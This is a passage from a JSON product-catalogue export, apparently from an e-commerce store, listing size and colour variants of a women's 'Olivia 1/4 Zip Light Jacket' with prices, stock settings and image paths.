_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1338\":{\"sku\":\"WJ12-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-S-Blue\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1339\":{\"sku\":\"WJ12-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-S-Purple\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1340\":{\"sku\":\"WJ12-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-M-Black\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1341\":{\"sku\":\"WJ12-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-M-Blue\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1342\":{\"sku\":\"WJ12-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-M-Purple\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1343\":{\"sku\":\"WJ12-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-L-Black\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1344\":{\"sku\":\"WJ12-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-L-Blue\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1345\":{\"sku\":\"WJ12-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-L-Purple\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1346\":{\"sku\":\"WJ12-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-XL-Black\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"